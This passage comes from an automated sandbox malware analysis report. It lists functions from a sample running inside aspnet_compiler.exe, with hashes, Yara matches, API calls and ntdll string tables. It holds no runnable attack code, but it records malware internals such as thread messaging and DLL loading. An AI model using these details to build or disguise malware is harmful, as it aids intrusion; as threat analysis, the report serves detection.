                                                      • Opcode Fuzzy Hash: d37cc8d9fca5d477c40688d7715fed5259d32aea2e4469be626d2ce555fa3794
                                                      • Instruction Fuzzy Hash: D790023260188842D1157158840474A040597D0341F59C451A442469DDC7958AD17221
                                                      Function 01AF35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 14aa96d6fe81f173833dd3f96c73bbad369f6539ac263bb21a4b5f5004c56873
                                                      • Instruction ID: b04df8a08ad3cdf8b76ac190a7bf45585467035e4dd658d6c6a6510aebb4f1f9
                                                      • Opcode Fuzzy Hash: 14aa96d6fe81f173833dd3f96c73bbad369f6539ac263bb21a4b5f5004c56873
                                                      • Instruction Fuzzy Hash: 03900232A0590442D10571584514706140597D0241F65C451A04245ADDC7958B9166A2
                                                      Function 00413973 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 48663I1M$48663I1M$|:/,
                                                      • API String ID: 0-303600315
                                                      • Opcode ID: 0e00d38d36c02081e60a30f23ddb35e44fce906e9fcc8cbfcd5dc23179053a33
                                                      • Instruction ID: 4c53796a2bbe588b6f5bed944504159558d9088fe723f5d74f5de34720e819dc
                                                      • Opcode Fuzzy Hash: 0e00d38d36c02081e60a30f23ddb35e44fce906e9fcc8cbfcd5dc23179053a33
                                                      • Instruction Fuzzy Hash: 6631EEB6904289AADB11CF76D8818DEFF28EF82765708419FF4845B282D3698B43C7D5
                                                      Function 00413A65 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(48663I1M,00000111,00000000,00000000), ref: 00413AEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 48663I1M$48663I1M
                                                      • API String ID: 1836367815-3275742752
                                                      • Opcode ID: 1e46fa45812cf000f5601a18fa8661ab693edced89af0adcd2035801ba032c3d
                                                      • Instruction ID: faf438f0a42c4484ae20dd3647e5043e1d904cc3d22015de33974d1598960fd7
                                                      • Opcode Fuzzy Hash: 1e46fa45812cf000f5601a18fa8661ab693edced89af0adcd2035801ba032c3d
                                                      • Instruction Fuzzy Hash: A911C271E0015C7AEB119AE69C82DEFBB7CDF81398F058069FA1467241D6784F068BF2
                                                      Function 00413A73 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(48663I1M,00000111,00000000,00000000), ref: 00413AEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 48663I1M$48663I1M
                                                      • API String ID: 1836367815-3275742752
                                                      • Opcode ID: 37b03efa5f797630831898e0bd572c345bfa973d0285704617e8c1c5f4d4303b
                                                      • Instruction ID: 61a0af3ef922ccafc4ee937e8046c97fd439620931e217a66ed38042d50e87ac
                                                      • Opcode Fuzzy Hash: 37b03efa5f797630831898e0bd572c345bfa973d0285704617e8c1c5f4d4303b
                                                      • Instruction Fuzzy Hash: D201DB71D0015C7AEB119AE69C82DEFBB7CDF81398F448059FA1467241D6784F068BF2
                                                      Function 004172EF Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 127 4172ef-4172f5 128 4172f7-41731d 127->128 129 4172bf-4172c0 127->129 130 417281-417283 129->130 131 4172c2-4172ca 129->131 132 417289-417291 130->132 133 417284 call 42d833 130->133 134 417293-4172a7 LdrLoadDll 132->134 135 4172aa-4172ad 132->135 133->132 134->135
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4b94c2314521d8f25ea77e2c4b1031aa999e68fa5996bdd45285a49d38e8a29
                                                      • Instruction ID: 7ef236bf29f6fc465eefc6d8e127db05605fd43d645d9003b4479031918b1c11
                                                      • Opcode Fuzzy Hash: c4b94c2314521d8f25ea77e2c4b1031aa999e68fa5996bdd45285a49d38e8a29
                                                      • Instruction Fuzzy Hash: A601F975D4060A9BE700CFA9D844BEAB7B5EF58704F40859AE81947201EB35A683CB85
                                                      Function 0042C453 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 141 42c453-42c497 call 4047a3 call 42d323 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0010FC45,00000007,00000000,00000004,00000000,00416ABC,000000F4), ref: 0042C492
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 21a887275888f9565f0d5c27f43f3595d2ce9c6cf8850c99fe8b9620a2e14d34
                                                      • Instruction ID: c2c1650f588815764446ca57801b254d5b52fd0734d76057fa41123b49cfe763
                                                      • Opcode Fuzzy Hash: 21a887275888f9565f0d5c27f43f3595d2ce9c6cf8850c99fe8b9620a2e14d34
                                                      • Instruction Fuzzy Hash: 41E092766002047FDA14EE59EC45F9B33ACDFC5710F004029FE48A7241CA70BD108BB5
                                                      Function 0042C403 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 136 42c403-42c447 call 4047a3 call 42d323 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041E014,?,?,00000000,?,0041E014,?,?,?), ref: 0042C442
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: a6ff5ca3a5dbbea5a6c0b0ac1db6e56cf909ba38468f7b4cb112d0a282205096
                                                      • Instruction ID: 2031063bdd24a5c73878bc49abb75836127a061c2ddf498a79c88550795f9044
                                                      • Opcode Fuzzy Hash: a6ff5ca3a5dbbea5a6c0b0ac1db6e56cf909ba38468f7b4cb112d0a282205096
                                                      • Instruction Fuzzy Hash: 3EE06D716002057FCA10EE59EC41EAB37ACDFC6710F004019FD48A7281CA75BD1087B9
                                                      Function 0042C4A3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 151 42c4a3-42c4dc call 4047a3 call 42d323 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,7617ECF7,?,?,7617ECF7), ref: 0042C4D7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 116f56b33a6681442843f653e48fbae67dfab84fab61d37db62a82b460477013
                                                      • Instruction ID: 54aa0adfa8b929dc26348b827991173d2013a9d8473a090a4b33f76ef629a122
                                                      • Opcode Fuzzy Hash: 116f56b33a6681442843f653e48fbae67dfab84fab61d37db62a82b460477013
                                                      • Instruction Fuzzy Hash: B0E0DF352012047BC110EA5ADC01F9B776CDBC5320F404019FA0867241CA74B90087F1
                                                      Function 01AF2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 156 1af2c0a-1af2c0f 157 1af2c1f-1af2c26 LdrInitializeThunk 156->157 158 1af2c11-1af2c18 156->158
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4293b01e6a8cf9ddca5b47cec5957ec832de4092bc543dbd5c5989e81f0dd20f
                                                      • Instruction ID: 50d04c62b374d11386772dcbafa7f41cb499096691ee4a25885e43abf00dbcb7
                                                      • Opcode Fuzzy Hash: 4293b01e6a8cf9ddca5b47cec5957ec832de4092bc543dbd5c5989e81f0dd20f
                                                      • Instruction Fuzzy Hash: E3B09B72D019C5C5DA16E7A446087177D00B7D0741F15C076E3030686F8738C5D1E275

                                                      Non-executed Functions

                                                      Function 01B32349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2160512332
                                                      • Opcode ID: 3831a6bfc5c4c1c82aad8308684bb770ba3b6fa275eb46452ba804d30a3f38bb
                                                      • Instruction ID: 0e5cecdd8e18366f84e3e6fcdcd8d9599f797bbb638b21996633f4f8360501a5
                                                      • Opcode Fuzzy Hash: 3831a6bfc5c4c1c82aad8308684bb770ba3b6fa275eb46452ba804d30a3f38bb
                                                      • Instruction Fuzzy Hash: EF928D71608742AFE729DE29C880B6BB7E8FF84750F0449ADFA94D7250D770E854CB92
                                                      Function 01AE8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • 8, xrefs: 01B252E3
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B254E2
                                                      • corrupted critical section, xrefs: 01B254C2
                                                      • undeleted critical section in freed memory, xrefs: 01B2542B
                                                      • Critical section debug info address, xrefs: 01B2541F, 01B2552E
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B2540A, 01B25496, 01B25519
                                                      • Invalid debug info address of this critical section, xrefs: 01B254B6
                                                      • double initialized or corrupted critical section, xrefs: 01B25508
                                                      • Thread identifier, xrefs: 01B2553A
                                                      • Critical section address., xrefs: 01B25502
                                                      • Critical section address, xrefs: 01B25425, 01B254BC, 01B25534
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01B25543
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B254CE
                                                      • Address of the debug info found in the active list., xrefs: 01B254AE, 01B254FA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      • Opcode ID: 987cef01669a52191d287115a770f3233426c8590437544d3b0df089f19d24a6
                                                      • Instruction ID: 0457984c24a7c56d01f75ba2d983e1259b2e966d66469f8043b67aaa25fdcfaf
                                                      • Opcode Fuzzy Hash: 987cef01669a52191d287115a770f3233426c8590437544d3b0df089f19d24a6
                                                      • Instruction Fuzzy Hash: F58178B0A00358AFDF24CF99C945BAEBBF5FB49714F104159E508BB281D379A985CBA0
                                                      Function 01AE29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01B22412
                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01B22409
                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 01B2261F
                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01B224C0
                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01B22602
                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01B222E4
                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01B22624
                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01B225EB
                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01B22498
                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01B22506
                                                      • @, xrefs: 01B2259B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                      • API String ID: 0-4009184096
                                                      • Opcode ID: 50ae7d04bf3adf37081695f30500e35bbbc019dc20ba0cd6c57a3204c34b1c6c
                                                      • Instruction ID: 84dfca48ae304f06bdc26687896972f9ec178eda957ea46a0714099b70197fb4
                                                      • Opcode Fuzzy Hash: 50ae7d04bf3adf37081695f30500e35bbbc019dc20ba0cd6c57a3204c34b1c6c
                                                      • Instruction Fuzzy Hash: 74027FF1D002299BDB35DB54CD84BAAB7B8AF54304F4441DAE70DA7241DB309E98CF69
                                                      Function 01B58B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                      • API String ID: 0-2515994595
                                                      • Opcode ID: 620a987057407e7d129268f9010985e6604f47d844f3b0aeaa755a571b7e79f1
                                                      • Instruction ID: d518d478a49a2db48b77fe84cce2bb5907f080492001ef4c1ab78992bb24b833
                                                      • Opcode Fuzzy Hash: 620a987057407e7d129268f9010985e6604f47d844f3b0aeaa755a571b7e79f1
                                                      • Instruction Fuzzy Hash: 4B51F0715143019BD36ADF5A8984BABBBECFF94640F240A5DFE99C3280E770D644CB92
                                                      Function 01B60274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                      • API String ID: 0-1700792311
                                                      • Opcode ID: d8ff78b67826fe78a7f35f0db725fd33a6c9c2ed11703d1ab96b007368fd511e
                                                      • Instruction ID: 0265cd7486247a2152f62e8cc74f61ea8c132ff29032e3f5b653fdac92c3ece5
                                                      • Opcode Fuzzy Hash: d8ff78b67826fe78a7f35f0db725fd33a6c9c2ed11703d1ab96b007368fd511e
                                                      • Instruction Fuzzy Hash: 06D11531500686EFDB2AEF6AC441AAEBFF5FF69700F488099F4459B252D778D981CB10
                                                      Function 01B389B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B38A3D
                                                      • VerifierDebug, xrefs: 01B38CA5
                                                      • HandleTraces, xrefs: 01B38C8F
                                                      • VerifierFlags, xrefs: 01B38C50
                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B38A67
                                                      • AVRF: -*- final list of providers -*- , xrefs: 01B38B8F
                                                      • VerifierDlls, xrefs: 01B38CBD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                      • API String ID: 0-3223716464
                                                      • Opcode ID: 79d4faddbfd152349b75189b04c74ed829848d36b2356cb6a18eb284534c44c1
                                                      • Instruction ID: 34a83bab09e5b6e7d08d43d4aceedb4e1633cce2aa849bbb424dcb7761277f42
                                                      • Opcode Fuzzy Hash: 79d4faddbfd152349b75189b04c74ed829848d36b2356cb6a18eb284534c44c1
                                                      • Instruction Fuzzy Hash: F59166B2644706AFDB39DF28C981B5BB7E4EBC4714F84069CFA41AB240D770AD21C792
                                                      Function 01ABEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                      • API String ID: 0-1109411897
                                                      • Opcode ID: 649592f98763dab7c4dcfe41883b96b9f3d09a76ea893226f5f281ba38ee17fb
                                                      • Instruction ID: 19fcfdd4287a9ca16befa4961e6c144986fd120bc95a434b3d18c371a8ed737e
                                                      • Opcode Fuzzy Hash: 649592f98763dab7c4dcfe41883b96b9f3d09a76ea893226f5f281ba38ee17fb
                                                      • Instruction Fuzzy Hash: 6EA24774A0566A8FDB68CF18CD887E9BBB9EF45304F5942E9D90DA7255DB309E80CF00
                                                      Function 01AE63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-792281065
                                                      • Opcode ID: 44baf4288e77f99ac86e6da32e6ec9054f345378deec8e498f79a8da390c2f2b
                                                      • Instruction ID: bcbe62a862b59d2180bc07a6af0a61024f2788692451a125eeb1106942d43ac4
                                                      • Opcode Fuzzy Hash: 44baf4288e77f99ac86e6da32e6ec9054f345378deec8e498f79a8da390c2f2b
                                                      • Instruction Fuzzy Hash: B4918970B00325ABEB39DF19D949BAA7FE1FF11B14F5800ADE9086B682D7709845C7D0
                                                      Function 01AA645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • apphelp.dll, xrefs: 01AA6496
                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01B099ED
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01B09A11, 01B09A3A
                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01B09A2A
                                                      • LdrpInitShimEngine, xrefs: 01B099F4, 01B09A07, 01B09A30
                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01B09A01
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-204845295
                                                      • Opcode ID: 1bbe356f06e2ef1a05f7ac9ffda2ea42a0d8fcb32be82480f75e268a1caf5ba0
                                                      • Instruction ID: 24c7db9204d289df548f50240af77ca20acf3abe013093653f5e6cee72ef500c
                                                      • Opcode Fuzzy Hash: 1bbe356f06e2ef1a05f7ac9ffda2ea42a0d8fcb32be82480f75e268a1caf5ba0
                                                      • Instruction Fuzzy Hash: 7B51B371208305AFEB25DF24D941FABBBE8FB84748F44491EF5899B1A1D730E944CB92
                                                      Function 01AEC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpInitializeImportRedirection, xrefs: 01B28177, 01B281EB
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01AEC6C3
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 01B281E5
                                                      • LdrpInitializeProcess, xrefs: 01AEC6C4
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01B28181, 01B281F5
                                                      • Loading import redirection DLL: '%wZ', xrefs: 01B28170
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-475462383
                                                      • Opcode ID: 761967bf86c728326a553c05c614d5e29e2b51b0eac8226c00d8b328a1ab7b5f
                                                      • Instruction ID: d6ea6b91c88468d4e0da7252c19213ae1150195e4b4898ea1285a6b0926c0831
                                                      • Opcode Fuzzy Hash: 761967bf86c728326a553c05c614d5e29e2b51b0eac8226c00d8b328a1ab7b5f
                                                      • Instruction Fuzzy Hash: E7312571644716AFC724EF29D946E2BBBE4FF94B20F04055CF945AB295E720EC04CBA2
                                                      Function 01AE2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01B22178
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01B2219F
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01B22180
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01B221BF
                                                      • RtlGetAssemblyStorageRoot, xrefs: 01B22160, 01B2219A, 01B221BA
                                                      • SXS: %s() passed the empty activation context, xrefs: 01B22165
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      • API String ID: 0-861424205
                                                      • Opcode ID: 7101de2dfa77b1b245713e72faf86e4a8281bcf83ede24c4700a10b8a06915bc
                                                      • Instruction ID: bdb50340630161b4b00d05b7931d022f43b41ecf46eadf3acfee9ccdf347bcbc
                                                      • Opcode Fuzzy Hash: 7101de2dfa77b1b245713e72faf86e4a8281bcf83ede24c4700a10b8a06915bc
                                                      • Instruction Fuzzy Hash: 44310836E4022577FB259A9ACC45F6B7AB8EB94B50F1540DAFA04FB140D3709A41C6A1
                                                      Function 01AF096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
